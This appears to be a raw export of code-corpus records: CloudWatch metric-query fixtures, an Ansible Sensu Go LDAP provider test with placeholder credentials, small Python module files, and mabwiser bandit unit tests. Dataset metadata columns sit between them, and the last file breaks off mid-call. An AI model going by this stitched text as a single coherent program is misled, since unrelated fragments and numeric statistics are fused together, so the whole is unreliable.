'Id': 'id_1',
'MetricStat': {
'Metric': {
'Namespace': 'metricPublisherAppNamespace',
'MetricName': 'theMetricName1',
'Dimensions': [
{
'Name': 'test_name',
'Value': 'test_value'
}
]
},
'Period': 1,
'Stat': 'Average'
}
},
{
'Id': 'id_2',
'MetricStat': {
'Metric': {
'Namespace': 'metricPublisherAppNamespace',
'MetricName': 'theMetricName2',
'Dimensions': [
{
'Name': 'test_name',
'Value': 'test_value'
}
]
},
'Period': 1,
'Stat': 'Average'
}
},
{
'Id': 'id_3',
'MetricStat': {
'Metric': {
'Namespace': 'metricPublisherAppNamespace',
'MetricName': 'theMetricName2',
'Dimensions': [
{
'Name': 'test_name',
'Value': 'test_value'
}
]
},
'Period': 1,
'Stat': 'Sum'
}
},
{
'Id': 'id_4',
'MetricStat': {
'Metric': {
'Namespace': 'metricPublisherAppNamespace',
'MetricName': 'theMetricName3',
'Dimensions': [
{
'Name': 'test_name',
'Value': 'test_value'
}
]
},
'Period': 1,
'Stat': 'SampleCount'
}
},
{
'Id': 'id_5',
'MetricStat': {
'Metric': {
'Namespace': 'metricPublisherAppNamespace',
'MetricName': 'theMetricName3',
'Dimensions': [
{
'Name': 'test_name',
'Value': 'test_value'
}
]
},
'Period': 1,
'Stat': 'Sum'
}
},
{
'Id': 'id_6',
'MetricStat': {
'Metric': {
'Namespace': 'metricPublisherAppNamespace',
'MetricName': 'theMetricName3',
'Dimensions': [
{
'Name': 'test_name',
'Value': 'test_value'
}
]
},
'Period': 1,
'Stat': 'Minimum'
}
},
{
'Id': 'id_7',
'MetricStat': {
'Metric': {
'Namespace': 'metricPublisherAppNamespace',
'MetricName': 'theMetricName3',
'Dimensions': [
{
'Name': 'test_name',
'Value': 'test_value'
}
]
},
'Period': 1,
'Stat': 'Maximum'
}
},
{
'Id': 'id_8',
'MetricStat': {
'Metric': {
'Namespace': 'metricPublisherAppNamespace',
'MetricName': 'theMetricName3',
'Dimensions': [
{
'Name': 'test_name',
'Value': 'test_value'
}
]
},
'Period': 1,
'Stat': 'Average'
}
},
{
'Id': 'id_9',
'MetricStat': {
'Metric': {
'Namespace': 'metricPublisherAppNamespace',
'MetricName': 'theMetricName4',
'Dimensions': [
{
'Name': 'test_name',
'Value': 'test_value'
}
]
},
'Period': 5,
'Stat': 'SampleCount'
}
},
{
'Id': 'id_10',
'MetricStat': {
'Metric': {
'Namespace': 'metricPublisherAppNamespace',
'MetricName': 'theMetricName4',
'Dimensions': [
{
'Name': 'test_name',
'Value': 'test_value'
}
]
},
'Period': 5,
'Stat': 'Average'
}
}
]
| 29.166667
| 63
| 0.313936
| 460
| 8,575
| 5.608696
| 0.154348
| 0.069767
| 0.111628
| 0.136434
| 0.879457
| 0.855426
| 0.832946
| 0.832946
| 0.749225
| 0.749225
| 0
| 0.020125
| 0.571195
| 8,575
| 293
| 64
| 29.266212
| 0.681534
| 0.005015
| 0
| 0.513793
| 0
| 0
| 0.238447
| 0.031668
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006897
| false
| 0
| 0.010345
| 0.003448
| 0.024138
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4b9e1c463e1cae9ca28e1415a047e6563fbc4086
| 10,619
|
py
|
Python
|
venv/lib/python3.6/site-packages/ansible_collections/sensu/sensu_go/tests/unit/plugins/modules/test_ldap_auth_provider.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 1
|
2020-01-22T13:11:23.000Z
|
2020-01-22T13:11:23.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/sensu/sensu_go/tests/unit/plugins/modules/test_ldap_auth_provider.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 12
|
2020-02-21T07:24:52.000Z
|
2020-04-14T09:54:32.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/sensu/sensu_go/tests/unit/plugins/modules/test_ldap_auth_provider.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import sys
import pytest
from ansible_collections.sensu.sensu_go.plugins.module_utils import (
errors,
utils,
)
from ansible_collections.sensu.sensu_go.plugins.modules import ldap_auth_provider
from .common.utils import (
AnsibleExitJson,
AnsibleFailJson,
ModuleTestCase,
set_module_args,
)
pytestmark = pytest.mark.skipif(
sys.version_info < (2, 7), reason="requires python2.7 or higher"
)
class TestDoDiffer:
def test_no_changes(self):
desired = dict(
spec=dict(
servers=[
dict(
host="127.0.0.1",
group_search=dict(
base_dn="dc=acme,dc=org",
),
user_search=dict(
base_dn="dc=acme,dc=org",
),
)
],
),
metadata=dict(name="openldap"),
)
current = dict(
spec=dict(
servers=[
dict(
host="127.0.0.1",
group_search=dict(
base_dn="dc=acme,dc=org",
),
user_search=dict(
base_dn="dc=acme,dc=org",
),
)
],
),
metadata=dict(
name="openldap",
created_by="me",
),
)
assert ldap_auth_provider.do_differ(current, desired) is False
def test_changes_are_detected(self):
desired = dict(
spec=dict(
servers=[
dict(
host="127.0.0.1",
port=636,
group_search=dict(
base_dn="dc=acme,dc=org",
),
user_search=dict(
base_dn="dc=acme,dc=org",
),
)
],
),
metadata=dict(name="openldap"),
)
current = dict(
spec=dict(
servers=[
dict(
host="127.0.0.1",
group_search=dict(
base_dn="dc=acme,dc=org",
),
user_search=dict(
base_dn="dc=acme,dc=org",
),
)
],
),
metadata=dict(
name="openldap",
created_by="me",
),
)
assert ldap_auth_provider.do_differ(current, desired) is True
def test_changes_are_detected_diff_servers_len(self):
desired = dict(
spec=dict(
servers=[
dict(
host="127.0.0.1",
group_search=dict(
base_dn="dc=acme,dc=org",
),
user_search=dict(
base_dn="dc=acme,dc=org",
),
),
dict(
host="127.0.0.2",
group_search=dict(
base_dn="dc=acme,dc=org",
),
user_search=dict(
base_dn="dc=acme,dc=org",
),
),
],
),
metadata=dict(name="openldap"),
)
current = dict(
spec=dict(
servers=[
dict(
host="127.0.0.1",
group_search=dict(
base_dn="dc=acme,dc=org",
),
user_search=dict(
base_dn="dc=acme,dc=org",
),
)
],
),
metadata=dict(
name="openldap",
created_by="me",
),
)
assert ldap_auth_provider.do_differ(current, desired) is True
def test_changes_are_other_params(self):
desired = dict(
spec=dict(
servers=[],
groups_prefix="ldap",
username_prefix="ldap",
),
metadata=dict(name="openldap"),
)
current = dict(
spec=dict(
servers=[],
),
metadata=dict(
name="openldap",
created_by="me",
),
)
assert ldap_auth_provider.do_differ(current, desired) is True
class TestLDAPAutProvider(ModuleTestCase):
def test_minimal_provider_parameters(self, mocker):
sync_v1_mock = mocker.patch.object(utils, "sync_v1")
sync_v1_mock.return_value = True, {}
set_module_args(
state="present",
name="openldap",
servers=[
dict(
host="127.0.0.1",
group_search=dict(
base_dn="dc=acme,dc=org",
),
user_search=dict(
base_dn="dc=acme,dc=org",
),
)
],
)
with pytest.raises(AnsibleExitJson):
ldap_auth_provider.main()
state, _client, path, payload, check_mode, _do_differ = sync_v1_mock.call_args[
0
]
assert state == "present"
assert path == "/api/enterprise/authentication/v2/authproviders/openldap"
assert payload == dict(
type="ldap",
api_version="authentication/v2",
metadata=dict(name="openldap"),
spec=dict(
servers=[
dict(
host="127.0.0.1",
port=None,
insecure=False,
security="tls",
trusted_ca_file=None,
client_cert_file=None,
client_key_file=None,
binding=None,
group_search=dict(
base_dn="dc=acme,dc=org",
attribute="member",
name_attribute="cn",
object_class="groupOfNames",
),
user_search=dict(
base_dn="dc=acme,dc=org",
attribute="uid",
name_attribute="cn",
object_class="person",
),
)
]
),
)
assert check_mode is False
def test_all_provider_parameters(self, mocker):
sync_v1_mock = mocker.patch.object(utils, "sync_v1")
sync_v1_mock.return_value = True, {}
set_module_args(
state="present",
name="openldap",
servers=[
dict(
host="127.0.0.1",
port=636,
insecure=False,
security="tls",
trusted_ca_file="/path/to/trusted-certificate-authorities.pem",
client_cert_file="/path/to/ssl/cert.pem",
client_key_file="/path/to/ssl/key.pem",
binding=dict(
user_dn="cn=binder,dc=acme,dc=org",
password="YOUR_PASSWORD",
),
group_search=dict(
base_dn="dc=acme,dc=org",
attribute="member",
name_attribute="cn",
object_class="groupOfNames",
),
user_search=dict(
base_dn="dc=acme,dc=org",
attribute="uid",
name_attribute="cn",
object_class="person",
),
)
],
groups_prefix="ldap",
username_prefix="ldap",
)
with pytest.raises(AnsibleExitJson):
ldap_auth_provider.main()
state, _client, path, payload, check_mode, _do_differ = sync_v1_mock.call_args[
0
]
assert state == "present"
assert path == "/api/enterprise/authentication/v2/authproviders/openldap"
assert payload == dict(
type="ldap",
api_version="authentication/v2",
metadata=dict(name="openldap"),
spec=dict(
servers=[
dict(
host="127.0.0.1",
port=636,
insecure=False,
security="tls",
trusted_ca_file="/path/to/trusted-certificate-authorities.pem",
client_cert_file="/path/to/ssl/cert.pem",
client_key_file="/path/to/ssl/key.pem",
binding=dict(
user_dn="cn=binder,dc=acme,dc=org",
password="YOUR_PASSWORD",
),
group_search=dict(
base_dn="dc=acme,dc=org",
attribute="member",
name_attribute="cn",
object_class="groupOfNames",
),
user_search=dict(
base_dn="dc=acme,dc=org",
attribute="uid",
name_attribute="cn",
object_class="person",
),
)
],
groups_prefix="ldap",
username_prefix="ldap",
),
)
assert check_mode is False
def test_failure(self, mocker):
sync_mock = mocker.patch.object(utils, "sync_v1")
sync_mock.side_effect = errors.Error("Bad error")
set_module_args()
with pytest.raises(AnsibleFailJson):
ldap_auth_provider.main()
| 32.474006
| 87
| 0.392975
| 859
| 10,619
| 4.639115
| 0.168801
| 0.036136
| 0.048181
| 0.066248
| 0.853701
| 0.842158
| 0.826098
| 0.781681
| 0.772647
| 0.7601
| 0
| 0.018164
| 0.512666
| 10,619
| 326
| 88
| 32.57362
| 0.751884
| 0
| 0
| 0.788779
| 0
| 0
| 0.105566
| 0.02731
| 0
| 0
| 0
| 0
| 0.039604
| 1
| 0.023102
| false
| 0.006601
| 0.019802
| 0
| 0.049505
| 0.0033
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
29fdd34d1bc64917d33052f85418eec4bfa32ad9
| 256
|
py
|
Python
|
gd/api/__init__.py
|
nekitdev/gd.py
|
b9d5e29c09f953f54b9b648fb677e987d9a8e103
|
[
"MIT"
] | 58
|
2020-09-30T16:51:22.000Z
|
2022-02-13T17:27:48.000Z
|
gd/api/__init__.py
|
NeKitDS/gd.py
|
b9d5e29c09f953f54b9b648fb677e987d9a8e103
|
[
"MIT"
] | 30
|
2019-07-29T12:03:41.000Z
|
2020-09-15T17:01:37.000Z
|
gd/api/__init__.py
|
NeKitDS/gd.py
|
b9d5e29c09f953f54b9b648fb677e987d9a8e103
|
[
"MIT"
] | 20
|
2019-12-06T03:16:57.000Z
|
2020-09-16T17:45:27.000Z
|
from gd.api.database import *
from gd.api.editor import *
from gd.api.enums import *
from gd.api.guidelines import *
from gd.api.hsv import *
from gd.api.loader import *
from gd.api.recording import *
from gd.api.struct import *
from gd.api.utils import *
| 25.6
| 31
| 0.753906
| 45
| 256
| 4.288889
| 0.288889
| 0.279793
| 0.419689
| 0.621762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140625
| 256
| 9
| 32
| 28.444444
| 0.877273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d9a57bb8322585e988cde6f0f871b1c39261023c
| 240
|
py
|
Python
|
securityheaders/checkers/hsts/checker.py
|
th3cyb3rc0p/securityheaders
|
941264be581dc01afe28f6416f2d7bed79aecfb3
|
[
"Apache-2.0"
] | 151
|
2018-07-29T22:34:43.000Z
|
2022-03-22T05:08:27.000Z
|
securityheaders/checkers/hsts/checker.py
|
th3cyb3rc0p/securityheaders
|
941264be581dc01afe28f6416f2d7bed79aecfb3
|
[
"Apache-2.0"
] | 5
|
2019-04-24T07:31:36.000Z
|
2021-04-15T14:31:23.000Z
|
securityheaders/checkers/hsts/checker.py
|
th3cyb3rc0p/securityheaders
|
941264be581dc01afe28f6416f2d7bed79aecfb3
|
[
"Apache-2.0"
] | 42
|
2018-07-31T08:18:59.000Z
|
2022-03-28T08:18:32.000Z
|
from securityheaders.models.hsts import HSTS
from securityheaders.checkers import Checker
class HSTSChecker(Checker):
def __init__(self):
pass
def gethsts(self, headers):
return self.extractheader(headers, HSTS)
| 24
| 50
| 0.733333
| 27
| 240
| 6.37037
| 0.62963
| 0.22093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.195833
| 240
| 9
| 51
| 26.666667
| 0.891192
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0.142857
| 0.285714
| 0.142857
| 0.857143
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
d9d840b321f1a82df14e1559ace374cd63ac7b84
| 80,753
|
py
|
Python
|
tests/test_mab.py
|
vishalbelsare/mabwiser
|
b0785a7b1da5342cc9b68be604f8f42f8a67958e
|
[
"Apache-2.0"
] | 60
|
2020-06-10T11:20:52.000Z
|
2022-03-25T02:16:47.000Z
|
tests/test_mab.py
|
vishalbelsare/mabwiser
|
b0785a7b1da5342cc9b68be604f8f42f8a67958e
|
[
"Apache-2.0"
] | 24
|
2020-06-04T18:40:21.000Z
|
2022-03-24T16:49:51.000Z
|
tests/test_mab.py
|
vishalbelsare/mabwiser
|
b0785a7b1da5342cc9b68be604f8f42f8a67958e
|
[
"Apache-2.0"
] | 12
|
2020-11-30T10:37:05.000Z
|
2022-03-25T02:16:41.000Z
|
# -*- coding: utf-8 -*-
import os
import pickle
from copy import deepcopy
import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler
from mabwiser.mab import MAB, LearningPolicy, NeighborhoodPolicy
from tests.test_base import BaseTest
class MABTest(BaseTest):
#################################################
# Test property decorator methods
################################################
def test_learning_policy_property(self):
for lp in BaseTest.lps:
mab = MAB([1, 2], lp)
test_lp = mab.learning_policy
self.assertTrue(type(test_lp) is type(lp))
for para_lp in BaseTest.para_lps:
mab = MAB([1, 2], para_lp)
test_lp = mab.learning_policy
self.assertTrue(type(test_lp) is type(para_lp))
for cp in BaseTest.cps:
for lp in BaseTest.lps:
mab = MAB([1, 2], lp, cp)
test_lp = mab.learning_policy
self.assertTrue(type(test_lp) is type(lp))
for cp in BaseTest.cps:
for para_lp in BaseTest.lps:
mab = MAB([1, 2], para_lp, cp)
test_lp = mab.learning_policy
self.assertTrue(type(test_lp) is type(para_lp))
def test_learning_policy_values(self):
lp = LearningPolicy.EpsilonGreedy(epsilon=0.6)
mab = MAB([0, 1], lp)
self.assertEqual(lp.epsilon, mab.learning_policy.epsilon)
data = np.array([[1, 2, 3], [3, 2, 1]])
sc = StandardScaler()
sc.fit(data)
arm_to_scaler = {0: sc, 1: sc}
lp = LearningPolicy.LinUCB(alpha=2.0, l2_lambda=0.3, arm_to_scaler=arm_to_scaler)
mab = MAB([0, 1], lp)
self.assertEqual(lp.alpha, mab.learning_policy.alpha)
self.assertEqual(lp.l2_lambda, mab.learning_policy.l2_lambda)
self.assertIs(sc, mab.learning_policy.arm_to_scaler[0])
self.assertIs(sc, mab.learning_policy.arm_to_scaler[1])
lp = LearningPolicy.Softmax(tau=0.5)
mab = MAB([0, 1], lp)
self.assertEqual(lp.tau, mab.learning_policy.tau)
def binary(arm, reward):
return reward == 1
lp = LearningPolicy.ThompsonSampling(binarizer=binary)
mab = MAB([0, 1], lp)
self.assertIs(lp.binarizer, mab.learning_policy.binarizer)
lp = LearningPolicy.UCB1(alpha=0.7)
mab = MAB([0, 1], lp)
self.assertEqual(lp.alpha, mab.learning_policy.alpha)
def test_neighborhood_policy_property(self):
for cp in BaseTest.cps:
for lp in BaseTest.lps:
mab = MAB([1, 2], lp, cp)
test_np = mab.neighborhood_policy
self.assertTrue(type(test_np) is type(cp))
for cp in BaseTest.cps:
for para_lp in BaseTest.lps:
mab = MAB([1, 2], para_lp, cp)
test_np = mab.neighborhood_policy
self.assertTrue(type(test_np) is type(cp))
def test_neighborhood_policy_values(self):
lp = LearningPolicy.EpsilonGreedy()
np = NeighborhoodPolicy.Clusters(n_clusters=3)
mab = MAB([0, 1], lp, np)
self.assertEqual(np.n_clusters, mab.neighborhood_policy.n_clusters)
self.assertFalse(mab.neighborhood_policy.is_minibatch)
np = NeighborhoodPolicy.Clusters(n_clusters=5, is_minibatch=True)
mab = MAB([0, 1], lp, np)
self.assertEqual(np.n_clusters, mab.neighborhood_policy.n_clusters)
self.assertTrue(mab.neighborhood_policy.is_minibatch)
np = NeighborhoodPolicy.KNearest(k=10, metric='cityblock')
mab = MAB([0, 1], lp, np)
self.assertEqual(np.k, mab.neighborhood_policy.k)
self.assertEqual(np.metric, mab.neighborhood_policy.metric)
np = NeighborhoodPolicy.Radius(radius=1.5, metric='canberra', no_nhood_prob_of_arm=[0.2, 0.8])
mab = MAB([0, 1], lp, np)
self.assertEqual(np.radius, mab.neighborhood_policy.radius)
self.assertEqual(np.metric, mab.neighborhood_policy.metric)
self.assertEqual(np.no_nhood_prob_of_arm, mab.neighborhood_policy.no_nhood_prob_of_arm)
np = NeighborhoodPolicy.LSHNearest(n_dimensions=2, n_tables=2, no_nhood_prob_of_arm=[0.2, 0.8])
mab = MAB([0, 1], lp, np)
self.assertEqual(np.n_dimensions, mab.neighborhood_policy.n_dimensions)
self.assertEqual(np.n_tables, mab.neighborhood_policy.n_tables)
self.assertEqual(np.no_nhood_prob_of_arm, mab.neighborhood_policy.no_nhood_prob_of_arm)
#################################################
# Test context free predict() method
################################################
def test_arm_list_int(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
def test_arm_list_str(self):
for lp in MABTest.lps:
self.predict(arms=["A", "B", "C"],
decisions=["A", "A", "A", "B", "B", "B", "C", "C", "C"],
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
for lp in MABTest.para_lps:
self.predict(arms=["A", "B", "C"],
decisions=["A", "A", "A", "B", "B", "B", "C", "C", "C"],
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
def test_decision_series(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3],
decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
def test_reward_series(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
def test_decision_reward_series(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3],
decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
def test_decision_array(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3],
decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
def test_reward_array(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
def test_decision_reward_array(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3],
decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
def test_decision_series_reward_array(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3],
decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
def test_decision_array_reward_series(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3],
decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
#################################################
# Test context free predict_expectation() method
################################################
def test_exp_arm_list_int(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=False)
def test_exp_arm_list_str(self):
for lp in MABTest.lps:
self.predict(arms=["A", "B", "C"],
decisions=["A", "A", "A", "B", "B", "B", "C", "C", "C"],
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=False)
def test_exp_decision_series(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=False)
def test_exp_reward_series(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=False)
def test_exp_decision_reward_series(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=False)
def test_exp_decision_array(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
